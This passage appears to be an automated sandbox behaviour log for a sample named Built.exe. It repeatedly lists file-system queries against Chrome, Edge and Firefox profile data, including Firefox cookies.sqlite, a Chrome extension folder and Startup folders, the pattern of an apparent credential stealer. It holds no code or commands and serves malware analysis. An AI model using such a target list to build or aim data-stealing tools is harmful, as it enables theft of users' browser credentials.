                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\unicodedata.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
